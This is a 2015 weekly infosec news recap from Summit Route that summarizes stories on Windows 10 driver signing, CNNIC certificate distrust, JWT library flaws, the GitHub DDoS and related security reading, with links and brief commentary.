Downclimb: Summit Route’s Weekly Infosec News Recap
2015.03.29 – 2015.04.05: https://SummitRoute.com
Quotes
“How does enabling 2FA help when database containing passwords (and likely 2FA seeds) is the compromise? http://slackhq.com/post/114696167740/march-2015-security-incident-and-launch-of-2fa” Root Labs
“The Security Industry is not designed to solve your security problems just like McDonald’s isn’t designed to solve world hunger. #dollars” @beaker
“Long uptime for security. No one ever tests their exploits against browsers with a week of uptime. Heap feng shui? More like heap makeover” the grugq
“To sum up, attribution to support retribution can only be done through offense, because deception is too easy.” Dave Aitel
Top stories
Driver Signing changes in Windows 10
Beginning with the release of Windows 10, all new Windows 10 kernel mode drivers must be submitted to and digitally signed by Microsoft. This means Microsoft will have copies of all drivers that can run on Windows 10. Exceptions are made for drivers released before Windows 10 for backwards compatibility.
- http://blogs.msdn.com/b/windows_hardware_certification/archive/2015/04/01/driver-signing-changes-in-windows-10.aspx
The failure of the security industry
Article by Alex Stamos (CISO for Yahoo) on the need for a platform as opposed to everyone building their own agents in addition to other concerns.
Also relevant is this tweet storm from him:
“Here are some tips for security sales.
1) A demo is worth a thousand .pptx slides. cc @Beaker @daviottenheimer
2) CISOs don’t buy products, we send leads to directors who make the real decisions. Every time we risk them quitting, so it’s touchy
3) No, I don’t want to have “just” a “quick” 60 minute call. Somebody who takes those calls doesn’t actually have op responsibilities
4) You say “Huge mega-bank deployed us”. I hear “This product costs a fortune and only works with Windows”
5) No, I can’t come to dinner the Monday night of RSA. Every restaurant in the five county Bay Area is hosting an RSA dinner that night
6) The more you promise the less I believe. The key for earning trust is to demonstrate that you understand the limits of your product.
7) If your security product has general IT or operational benefits it is 10x easier to buy.
8) Best company to copy in this is Splunk. It’s a) A platform b) Has non-sec uses c) is testable without money or phone calls. Brilliant
9) The more popular a product aimed against nation-state adversaries, the less useful it becomes. Build to be flexible and unpredictable”
- http://www.scmagazine.com/the-failure-of-the-security-industry/article/403261/
CNNIC Certificate Authority no longer trusted
After discovering last week that a company called MCS Holdings had misused it’s certificate authority power, Google has decided to no longer recognize the Chinese root certificate authority CNNIC. Mozilla has also taken action against CNNIC, but they are only not trusting any certificates from CNNIC issued after 2015-04-01. Conceptually, this punishment is broken logic for the threat model. If you believe CNNIC is doing malicious things, then it is still quite capable of issuing certificates and counter signing them to be back-dated before 2015-04-01. If caught, this would of course be much more difficult to explain their way out of, so the assumption must be that CNNIC can be trusted, but they needed a strong slap on the wrist for their negligence.
- http://googleonlinesecurity.blogspot.com/2015/03/maintaining-digital-certificate-security.html?m=1
- https://blog.mozilla.org/security/2015/04/02/distrusting-new-cnnic-certificates/
Critical vulnerabilities in JSON Web Token libraries
JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. The header contains a signature to validate the token. Many implementations trust data that is not properly validated.
- https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries/
Github DDOS
Github was under a DDOS attack from China for projects related to bypassing the great firewall of China. China’s great firewall seems to have been responsible for MiTM’ing all connections out of China and adding some javascript that caused browsers to make requests to those projects. This is a really sloppy DDOS, and as retaliation (it’s a sloppy DDoS in part because this is possible) Github popped up alerts on the browsers every 5 seconds.
- http://insight-labs.org/?author=8
The Sad State of SMTP Encryption
SMTP (the protocol used to send email) cannot use encryption properly and are susceptible to MiTM attacks in order to read the plain-text.
- https://blog.filippo.io/the-sad-state-of-smtp-encryption/
Newspaper news
- Executive Order imposes sanctions against hackers: President Obama signed an executive order that allows for the assets of foreign hackers to be seized. This was already the case, so these things are really just political statements and potentially make it easier to enforce these rules. The most interesting aspect of this executive order is that it allows for the assets of companies to be seized that have profited from stolen intellectual property. So if an American company can prove that a Chinese company, for example, used information that was stolen from their company, whether or not they can prove this company was behind the theft, then they can get the US government to seize the assets of that company. This potentially avoids some attribution issues. Good commentary here.
Conference materials and publications
- Troopers: We mentioned some slides from Troopers last week, but now all videos are up.
- Modern Binary Exploitation: Course materials for a course on exploitation being taught at Rensselaer Polytechnic Institute (RPI). It’s about mid-way through the semester, so more materials will appear here in coming weeks.
Tools
- FreeSentry: FreeSentry is a plugin for LLVM to mitiage use-after-free vulnerabilities. It’s open-source but still in alpha stages. Introductory post is here.
Other reads
- Truecrypt audit complete: Nothing concerning was found in the Truecrypt audit. The main take-away is thus that you should feel fairly safe using Truecrypt.
- Volatile Cedar: Check Point report on a threat actor out of Lebanon.
- Out with unwanted ad injectors: 5% of visitors to Google had at least one ad injector installed.